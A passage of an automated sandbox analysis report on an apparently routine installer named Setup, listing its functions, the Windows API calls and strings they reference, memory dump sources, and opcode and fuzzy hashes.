                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D76968
                                                                                                                                                                    • #205.MSI(?,00000000,?,00000010,?,?,SkipProduct,?,?,VersionMaxInclusive,?,00000000,?,?,?,VersionMaxInclusive), ref: 69D769C3
                                                                                                                                                                    Strings
                                                                                                                                                                    • skipped after applying Relation criteria, xrefs: 69D76C29
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: #205H_prolog3
                                                                                                                                                                    • String ID: skipped after applying Relation criteria
                                                                                                                                                                    • API String ID: 2698596250-1982174377
                                                                                                                                                                    • Opcode ID: 0597165ca0e9d9f1b4a7b4785f7028079305b7976594d8a9a771770e8bd1f767
                                                                                                                                                                    • Instruction ID: 2ce337df6f9af9fc044618f4f2173821c498c1b15a94c93053920972bd858889
                                                                                                                                                                    • Opcode Fuzzy Hash: 0597165ca0e9d9f1b4a7b4785f7028079305b7976594d8a9a771770e8bd1f767
                                                                                                                                                                    • Instruction Fuzzy Hash: E6B17F35900289DFDF10CFA8C945BEDBBB9BF05318F548265E520AB781D774EA05CBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D754FB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 69D75562
                                                                                                                                                                      • Part of subcall function 69D74FAC: _memset.LIBCMT ref: 69D74FB4
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3InfoSystem_memset
                                                                                                                                                                    • String ID: %s - %s %s %s$Unknown OS
                                                                                                                                                                    • API String ID: 3853411852-1218788732
                                                                                                                                                                    • Opcode ID: 301edaa54a79c64f4876d7e785ea515e25c31369d91cf1291115d4bb8f1dbda8
                                                                                                                                                                    • Instruction ID: a739f3e213ea9897ff38cd85ab6f26838d42e28819712ce43158c0c6e746f4db
                                                                                                                                                                    • Opcode Fuzzy Hash: 301edaa54a79c64f4876d7e785ea515e25c31369d91cf1291115d4bb8f1dbda8
                                                                                                                                                                    • Instruction Fuzzy Hash: D34162725083819FD720CF64C840B9BBBE9BF89358F144A2DF494D7691DB30E5498BA3
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D84397 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8439E
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7A5D0: __EH_prolog3.LIBCMT ref: 69D7A5D7
                                                                                                                                                                      • Part of subcall function 69D7A5D0: SysFreeString.OLEAUT32(?), ref: 69D7A62B
                                                                                                                                                                      • Part of subcall function 69DA8863: _wcschr.LIBCMT ref: 69DA887A
                                                                                                                                                                      • Part of subcall function 69D844EA: __EH_prolog3.LIBCMT ref: 69D844F1
                                                                                                                                                                      • Part of subcall function 69D844EA: __CxxThrowException@8.LIBCMT ref: 69D845E9
                                                                                                                                                                      • Part of subcall function 69D84613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,69D842F8,69D6A794,02602230), ref: 69D8468D
                                                                                                                                                                      • Part of subcall function 69D84613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,69D842F8,69D6A794,02602230), ref: 69D8469E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Close$Exception@8FreeStringThrow_wcschr
                                                                                                                                                                    • String ID: RegKey$RegValueName
                                                                                                                                                                    • API String ID: 3842226755-3571311812
                                                                                                                                                                    • Opcode ID: e43d47c7a80a924547ef8d130c1139df3bcfd7fc9c4a704304f8b7ddc3247599
                                                                                                                                                                    • Instruction ID: 4258743acc7084a615284da1ffbf3913562dbd9511a00ba6dc2b93cf48a188ef
                                                                                                                                                                    • Opcode Fuzzy Hash: e43d47c7a80a924547ef8d130c1139df3bcfd7fc9c4a704304f8b7ddc3247599
                                                                                                                                                                    • Instruction Fuzzy Hash: 86414A35900289DFCB10DBB8C944ADEB7B9AF04328F148265E515EB781DB74DA15CBB2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D84265 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8426C
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7A63E: __EH_prolog3.LIBCMT ref: 69D7A645
                                                                                                                                                                      • Part of subcall function 69D7A63E: SysFreeString.OLEAUT32(?), ref: 69D7A69B
                                                                                                                                                                      • Part of subcall function 69D84397: __EH_prolog3.LIBCMT ref: 69D8439E
                                                                                                                                                                    • GetUserDefaultUILanguage.KERNEL32(69D6A794,02602230), ref: 69D84302
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$DefaultFreeLanguageStringUser
                                                                                                                                                                    • String ID: LCIDHint
                                                                                                                                                                    • API String ID: 188276182-1583853939
                                                                                                                                                                    • Opcode ID: ddeffbcdbbbb3d949c3b642e8b4d2b7438178e83bbba7cdc0ae6dec3551d22e2
                                                                                                                                                                    • Instruction ID: 7ce235658a94734a651cabd575ac99fe47707743376b00f63a596a2f18e8e292
                                                                                                                                                                    • Opcode Fuzzy Hash: ddeffbcdbbbb3d949c3b642e8b4d2b7438178e83bbba7cdc0ae6dec3551d22e2
                                                                                                                                                                    • Instruction Fuzzy Hash: 2141817590020ADFDB00CFE8CA84A9EB7B9BF44314F108178E465EB691CB31EE05CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698EE1AD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetThreadLocale.KERNEL32(00000000), ref: 698EE1FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocaleThread
                                                                                                                                                                    • String ID: UiInfo.xml
                                                                                                                                                                    • API String ID: 635194068-3938134364
                                                                                                                                                                    • Opcode ID: 4bfcc479d8daf51ad16dbb122ccb35be0fcef795f2132fe52a86f871cd558e2e
                                                                                                                                                                    • Instruction ID: 65b5b216556818cdfbb572e6aa896a3e8c79d0cb08eac448c603adb8fe030abc
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bfcc479d8daf51ad16dbb122ccb35be0fcef795f2132fe52a86f871cd558e2e
                                                                                                                                                                    • Instruction Fuzzy Hash: 38413B756087449FDB10DF68C448B2ABBE5FB8A368F008A1DF8A6C7791D734E905CB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D96E46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D96E4D
                                                                                                                                                                      • Part of subcall function 69D950B2: __EH_prolog3.LIBCMT ref: 69D950B9
                                                                                                                                                                      • Part of subcall function 69D950B2: GetLastError.KERNEL32(00000000,LoadLibrary,00000000,0000000C,69D96E7F,00000000,?), ref: 69D95110
                                                                                                                                                                      • Part of subcall function 69D950B2: __CxxThrowException@8.LIBCMT ref: 69D9512D
                                                                                                                                                                    • GetCommandLineW.KERNEL32(00000000,?), ref: 69D96E8F
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                      • Part of subcall function 69D9516F: FreeLibrary.KERNEL32(00000000,?,69D950F8,00000000,0000000C,69D96E7F,00000000,?), ref: 69D9517C
                                                                                                                                                                      • Part of subcall function 69D9516F: LoadLibraryW.KERNEL32(?,?,?,69D950F8,00000000,0000000C,69D96E7F,00000000,?), ref: 69D95194
                                                                                                                                                                      • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
                                                                                                                                                                      • Part of subcall function 69DBABA1: __EH_prolog3.LIBCMT ref: 69DBABA8
                                                                                                                                                                      • Part of subcall function 69DBABA1: GetProcAddress.KERNEL32(00000004,CreateClassFactory), ref: 69DBABB8
                                                                                                                                                                      • Part of subcall function 69DBABA1: GetLastError.KERNEL32 ref: 69DBABC6
                                                                                                                                                                      • Part of subcall function 69DBABA1: __CxxThrowException@8.LIBCMT ref: 69DBAC7D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ErrorException@8LastLibraryThrow$AddressCommandFreeLineLoadProc_malloc
                                                                                                                                                                    • String ID: passive
                                                                                                                                                                    • API String ID: 304155978-1995439567
                                                                                                                                                                    • Opcode ID: 9148eaec1cfe9b6f1dad7f3ba3adaf4336e15b864d162cfda1f3becfa53937dc
                                                                                                                                                                    • Instruction ID: ca2c72c21c94d3fe0920182072a08ee5e3e11c094f6f1ecc9c60f0e7d4e236d6
                                                                                                                                                                    • Opcode Fuzzy Hash: 9148eaec1cfe9b6f1dad7f3ba3adaf4336e15b864d162cfda1f3becfa53937dc
                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31ED75811349DBDF10EFB0C800B9DBBA5BF15318F00D979D865ABA80CB709A088BF1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA9268 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA926F
                                                                                                                                                                      • Part of subcall function 69DB02A3: __EH_prolog3.LIBCMT ref: 69DB02AA
                                                                                                                                                                      • Part of subcall function 69DB02A3: GetCommandLineW.KERNEL32(0000001C,69DA9382,02602230,69D6A794,?,69D7BFC7,00000018,69D7BC3C,02602254,?,?,?,?,?,?,UserExperienceDataCollection), ref: 69DB02AF
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CommandLine
                                                                                                                                                                    • String ID: Policy$UserExperienceDataCollection
                                                                                                                                                                    • API String ID: 1384747822-3168315836
                                                                                                                                                                    • Opcode ID: 711e55902e948c590f414d0f0fc576be5ce8125ef9d2b595383c5b5604ee9651
                                                                                                                                                                    • Instruction ID: 783e483e5bd91bdd43942c4e34030c2d4effdd1e059aac83088e696fb7bc85f3
                                                                                                                                                                    • Opcode Fuzzy Hash: 711e55902e948c590f414d0f0fc576be5ce8125ef9d2b595383c5b5604ee9651
                                                                                                                                                                    • Instruction Fuzzy Hash: E3313CB4A04245EFDB04DFA8C944AAE7BB9BF49354F148168F815DF781CB35DA04CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D81EBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D81EC6
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D819AD: __EH_prolog3.LIBCMT ref: 69D819B4
                                                                                                                                                                      • Part of subcall function 69D819AD: __CxxThrowException@8.LIBCMT ref: 69D81ADE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: BlockIf$DisplayText
                                                                                                                                                                    • API String ID: 2489616738-2498774408
                                                                                                                                                                    • Opcode ID: b1173c532b431cf40730fda7bd25ca97e00753691a6f0d9ac29b878ad5d277b9
                                                                                                                                                                    • Instruction ID: 600fdc81f86e0fb9b131377238b71e071443e64c2d7864d690e76786f59930ec
                                                                                                                                                                    • Opcode Fuzzy Hash: b1173c532b431cf40730fda7bd25ca97e00753691a6f0d9ac29b878ad5d277b9
                                                                                                                                                                    • Instruction Fuzzy Hash: 9A312FB5910249EFCF00DFA8C940A9E77B9BF45358F148168F825AB751C734EA19CBB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D857E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D857EC
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 69D85887
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$_memcpy_s
                                                                                                                                                                    • String ID: #(loc.
                                                                                                                                                                    • API String ID: 1663610674-1630946291
                                                                                                                                                                    • Opcode ID: 557f0b1460d2bee47c48489ec0ea38f5c41b459372061cc79c25be50213a790d
                                                                                                                                                                    • Instruction ID: c01bf70de439c5e7848ed143b9b14f787544c07e05e28d592adceaf945cd488c
                                                                                                                                                                    • Opcode Fuzzy Hash: 557f0b1460d2bee47c48489ec0ea38f5c41b459372061cc79c25be50213a790d
                                                                                                                                                                    • Instruction Fuzzy Hash: B731A076900114EFCF00DFA8C884A9D7BA5BF00328F44C675E925AFA91CB30EE15CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D8D8A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: RepairOverride$UninstallOverride
                                                                                                                                                                    • API String ID: 431132790-715699446
                                                                                                                                                                    • Opcode ID: 71f924119946d9cc54bc6f00d92a360a0f431991214934fc78eb4aea12e73628
                                                                                                                                                                    • Instruction ID: 0918e25ced121d13c8dfae8a466090d766a72fc451e0ad89723270a40d4a781b
                                                                                                                                                                    • Opcode Fuzzy Hash: 71f924119946d9cc54bc6f00d92a360a0f431991214934fc78eb4aea12e73628
                                                                                                                                                                    • Instruction Fuzzy Hash: F0316CB4500748EFCB10CFA8C941B9EBBB9BF15314F10897DE5699BB91C770A604CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F7ACF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 698F7AFC
                                                                                                                                                                      • Part of subcall function 698F7F08: GetLastError.KERNEL32(698F7B0B,?,?,?,00000000), ref: 698F7F08
                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,TFR,00000000,?,?,?,?,00000000), ref: 698F7B54
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Temp$ErrorFileLastNamePath
                                                                                                                                                                    • String ID: TFR
                                                                                                                                                                    • API String ID: 3373471080-3081930533
                                                                                                                                                                    • Opcode ID: e7bbc96b5a1227d5f9d24abb213f3175d80f64abe0bf6e6c1fa4a4bf96805e9f
                                                                                                                                                                    • Instruction ID: c6080bcb1d3aeef169a4a847396d36db36fe37d5067beb061f87ac786a1548a9
                                                                                                                                                                    • Opcode Fuzzy Hash: e7bbc96b5a1227d5f9d24abb213f3175d80f64abe0bf6e6c1fa4a4bf96805e9f
                                                                                                                                                                    • Instruction Fuzzy Hash: 15210AB1A002186AFB10DB58CC45FDE73BCAF05754F505AADF214E31C0D7749A868BA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAEA74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DAEA7B
                                                                                                                                                                    • GetComputerObjectNameW.SECUR32(00000007,00000000,69DAFA6E), ref: 69DAEAC0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ComputerH_prolog3NameObject
                                                                                                                                                                    • String ID: microsoft.com
                                                                                                                                                                    • API String ID: 4212761916-499418652
                                                                                                                                                                    • Opcode ID: 8e02fb83d33ab9d3567f9c0a43d4bcc969b446bb211fd9493b6d8c411c7e1b6d
                                                                                                                                                                    • Instruction ID: 159d831fca44b49bf8d751e2eb5753070362a266049309208676ce4c6111db87
                                                                                                                                                                    • Opcode Fuzzy Hash: 8e02fb83d33ab9d3567f9c0a43d4bcc969b446bb211fd9493b6d8c411c7e1b6d
                                                                                                                                                                    • Instruction Fuzzy Hash: B2219D35A00255CBCB04DFB8C844ABDBB72BF41328F509679D532A7AD0DB719A19C772
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

